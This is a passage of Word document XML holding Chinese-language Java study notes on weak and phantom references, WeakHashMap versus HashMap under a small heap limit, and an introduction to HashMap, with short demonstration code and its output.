        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214890F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77EDEBB4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>说明在系统内存紧张的情况下，软引用被回收。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D785D63" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>弱</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA388B1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>弱引用是一种比软引用较弱的引用类型。在系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，只要发现弱引用，不管系统堆空间是否足够，都会将对象进行回收。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中，可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>java.lang.ref.WeakReference</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例来保存对一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象的弱引用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BFAD2A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35630D4F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public void test3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34025C80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MyObject obj = new MyObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A37B4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">WeakReference sf = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new WeakReference(obj);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBE533F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>obj = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738C9803" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"+sf.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B09C4E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.gc();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596947DB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>"+sf.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F68F93" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEECD46" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0345CC3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B87FB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C08ADF4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cn.zyzpp.MyObject@42110406</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24066101" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23C4247A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8303E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="531F7EC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>软引用，弱引用都非常适合来保存那些可有可无的缓存数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如果这么做，当系统内存不足时，这些缓存数据会被回收，不会导致内存溢出。而当内存资源充足时，这些缓存数据又可以存在相当长的时间，从而起到加速系统的作用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4FAAB3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>虚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D549262" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>虚引用是所有类型中最弱的一个。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>一个持有虚引用的对象，和没有引用几乎是一样的，随时可能被垃圾回收器回收。</w:t>
      </w:r>
      <w:r>
        <w:t>当试图通过虚引用的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>方法取得强引用时，总是会失败</w:t>
      </w:r>
      <w:r>
        <w:t>。并且，虚引用必须和引用队列一起使用，它的作用在于跟踪垃圾回收过程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10808F19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EFE6F3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>当垃圾回收器准备回收一个对象时，如果发现它还有虚引用，就会在垃圾回收后，销毁这个对象，将这个虚引用加入引用队列。程序可以通过判断引用队列中是否已经加入了虚引用，来了解被引用的对象是否将要被垃圾回收。如果程序发现某个虚引用已经被加入到引用队列，那么就可以在所引用的对象的内存被回收之前采取必要的行动。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDBFEF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EB9390C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public void test3(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CE59B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>MyObject obj = new MyObject();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115407CA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ReferenceQueue referenceQueue = new ReferenceQueue&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBB891A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>PhantomReference sf = new PhantomReference&lt;&gt;(obj,referenceQueue);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3887978B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>obj = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD74F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:t>"+sf.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190C9D18" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>System.gc();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F35D24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:t>"+sf.get());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A48E320" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593E338A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="424C2B25" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>运行结果：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F200780" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACCAA45" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>是否被回收</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68ACDAC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A51E999" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>对虚引用的</w:t>
      </w:r>
      <w:r>
        <w:t>get()</w:t>
      </w:r>
      <w:r>
        <w:t>操作，总是返回</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>，因为</w:t>
      </w:r>
      <w:r>
        <w:t>sf.get()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的实现如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B5C3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public T get() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E58D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>return null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F31149" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EB0DFD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>类及其实现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C846F0A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>类在</w:t>
      </w:r>
      <w:r>
        <w:t>java.util</w:t>
      </w:r>
      <w:r>
        <w:t>包内，它实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:t>接口，是</w:t>
      </w:r>
      <w:r>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:t>的一种实现，它使用弱引用作为内部数据的存储方案。</w:t>
      </w:r>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>是弱引用的一种典型应用，它可以作为简单的缓存表解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA49B16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18DE8DA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>一下两段代码分别使用</w:t>
      </w:r>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:t>保存大量的数据：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEC5665" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BB32AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>@Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059372A9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public void test4(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A27B24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Map map = new WeakHashMap();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685AD1F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>for (int i =0;i&lt;10000;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F35964B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>map.put("key"+i,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>new byte[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D3C2F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EA6F97" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// map = new HashMap();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C7DE1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// for (int i =0;i&lt;10000;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A07B04" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>// map.put("key"+i,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>new byte[i]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9C0DAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>//}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C5EC7B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690E18D3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CDB574E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>-Xmx2M</w:t>
      </w:r>
      <w:r>
        <w:t>限定堆内存，使用</w:t>
      </w:r>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>的代码正常运行结束，而使用</w:t>
      </w:r>
      <w:r>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:t>的代码段抛出异常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B12074" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>java.lang.OutOfMemoryError: Java heap space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736E92A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>由此可见，</w:t>
      </w:r>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>会在系统内存紧张时使用弱引用，自动释放掉持有弱引用的内存数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709BE717" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FD60B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>但如果</w:t>
      </w:r>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:t>都在系统内持有强引用，那么</w:t>
      </w:r>
      <w:r>
        <w:t>WeakHashMap</w:t>
      </w:r>
      <w:r>
        <w:t>就退化为普通的</w:t>
      </w:r>
      <w:r>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r>
        <w:t>，因为所有的表项都无法被自动清理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E73C344" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>hashmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16D46D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>是一个散列表，它存储的内容是键值对</w:t>
      </w:r>
      <w:r>
        <w:t>(key-value)</w:t>
      </w:r>
      <w:r>
        <w:t>映射。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E059CC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>实现了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Map </w:t>
      </w:r>
      <w:r>
        <w:t>接口，根据键的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HashCode </w:t>
      </w:r>
      <w:r>
        <w:t>值存储数据，具有很快的访问速度，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>最多允许一条记录的键为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，不支持线程同步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1DF38" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>是无序的，即不会记录插入的顺序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D47B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">HashMap </w:t>
      </w:r>
      <w:r>
        <w:t>继承于</w:t>
      </w:r>
      <w:r>
        <w:t>AbstractMap</w:t>
      </w:r>
      <w:r>
        <w:t>，实现了</w:t>
      </w:r>
      <w:r>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
